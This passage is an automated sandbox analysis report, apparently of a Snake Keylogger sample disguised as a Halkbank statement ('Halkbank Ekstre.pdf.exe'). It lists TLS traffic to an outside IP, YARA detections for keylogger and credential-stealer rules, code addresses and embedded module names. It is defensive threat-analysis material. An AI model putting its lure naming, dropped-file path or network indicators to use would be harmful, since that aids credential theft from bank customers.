                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49850 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49915 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: initial sampleStatic PE information: Filename: Halkbank Ekstre.pdf.exe
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 0_2_06A95AA80_2_06A95AA8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 0_2_025C46680_2_025C4668
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 0_2_025C3E300_2_025C3E30
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 0_2_025C46580_2_025C4658
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 0_2_025C92A80_2_025C92A8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017BC1479_2_017BC147
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017BA0889_2_017BA088
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017B53629_2_017B5362
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017BD2789_2_017BD278
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017BC4689_2_017BC468
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017BC7389_2_017BC738
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017B69A09_2_017B69A0
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017BE9889_2_017BE988
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017BCA089_2_017BCA08
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017BCCD89_2_017BCCD8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017B6FC89_2_017B6FC8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017BCFAC9_2_017BCFAC
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017B3E099_2_017B3E09
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017BE97C9_2_017BE97C
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017BF9619_2_017BF961
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017B29EC9_2_017B29EC
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017B3B879_2_017B3B87
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_017B3AA19_2_017B3AA1
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF1E809_2_06FF1E80
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF17A09_2_06FF17A0
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFFC689_2_06FFFC68
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF9C189_2_06FF9C18
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF95489_2_06FF9548
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF0B309_2_06FF0B30
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF50289_2_06FF5028
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF29689_2_06FF2968
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFE6B09_2_06FFE6B0
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFE6AF9_2_06FFE6AF
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF1E709_2_06FF1E70
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFDE009_2_06FFDE00
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF178F9_2_06FF178F
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFEF609_2_06FFEF60
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFEF519_2_06FFEF51
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFCCA09_2_06FFCCA0
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFDDFF9_2_06FFDDFF
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFD5509_2_06FFD550
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFD5409_2_06FFD540
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFEAF89_2_06FFEAF8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFE2589_2_06FFE258
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFE2499_2_06FFE249
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFF3B89_2_06FFF3B8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF8BA09_2_06FF8BA0
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF0B209_2_06FF0B20
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFEB089_2_06FFEB08
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFD0F89_2_06FFD0F8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF00409_2_06FF0040
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF00289_2_06FF0028
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF50189_2_06FF5018
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFF8109_2_06FFF810
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFF8019_2_06FFF801
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFD9A89_2_06FFD9A8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FFD9999_2_06FFD999
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_0120466810_2_01204668
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_01203E3010_2_01203E30
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_0120465810_2_01204658
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_012092A810_2_012092A8
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B65D810_2_059B65D8
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BB4E010_2_059BB4E0
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BB0A010_2_059BB0A0
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BCD1810_2_059BCD18
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B6D4010_2_059B6D40
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BBC5010_2_059BBC50
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BDBB010_2_059BDBB0
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B5AA810_2_059B5AA8
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B7AF810_2_059B7AF8
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B758810_2_059B7588
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B65B910_2_059B65B9
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BD5B810_2_059BD5B8
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BD5C810_2_059BD5C8
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BC54810_2_059BC548
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B757810_2_059B7578
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BB4D110_2_059BB4D1
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B97D010_2_059B97D0
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B97C210_2_059B97C2
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BB71910_2_059BB719
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BB72810_2_059BB728
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BC09810_2_059BC098
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BB09110_2_059BB091
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BC08810_2_059BC088
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BA38010_2_059BA380
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BA37010_2_059BA370
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BCD0910_2_059BCD09
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B6D3110_2_059B6D31
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BAC3010_2_059BAC30
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BAC2010_2_059BAC20
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BBC4010_2_059BBC40
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BAE9810_2_059BAE98
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BAEA810_2_059BAEA8
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BDBA010_2_059BDBA0
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B5A9810_2_059B5A98
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B7AE810_2_059B7AE8
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BAA1010_2_059BAA10
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059BAA0010_2_059BAA00
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_076A4E2810_2_076A4E28
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_076A4E1810_2_076A4E18
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_076A690810_2_076A6908
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_076A71E010_2_076A71E0
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_076A49F010_2_076A49F0
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_076AC88010_2_076AC880
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017DC14717_2_017DC147
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017D711817_2_017D7118
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017DA08817_2_017DA088
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017D536217_2_017D5362
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017DD27817_2_017DD278
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017DC46817_2_017DC468
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017DC73817_2_017DC738
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017D69A017_2_017D69A0
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017DE98817_2_017DE988
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017DCA0817_2_017DCA08
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017DCCD817_2_017DCCD8
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017DCFAB17_2_017DCFAB
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017DE97B17_2_017DE97B
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017DF96117_2_017DF961
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017D29EC17_2_017D29EC
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017D3B8517_2_017D3B85
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017D3AA117_2_017D3AA1
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017D3E0917_2_017D3E09
                    Source: Halkbank Ekstre.pdf.exeBinary or memory string: OriginalFilename vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000000.1343538876.0000000000268000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesrmB.exe@ vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1436870943.000000000AEE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1435409726.00000000085D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1435409726.00000000085D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1422411265.000000000075E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1424810584.0000000002A67000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.00000000037F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1434818740.0000000006A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2600586919.00000000011E7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exeBinary or memory string: OriginalFilenamesrmB.exe@ vs Halkbank Ekstre.pdf.exe
                    Source: Halkbank Ekstre.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Halkbank Ekstre.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: uAHDaCgpWpsogA.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, VyF3LrZTnRfCPUYiQo.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, VyF3LrZTnRfCPUYiQo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
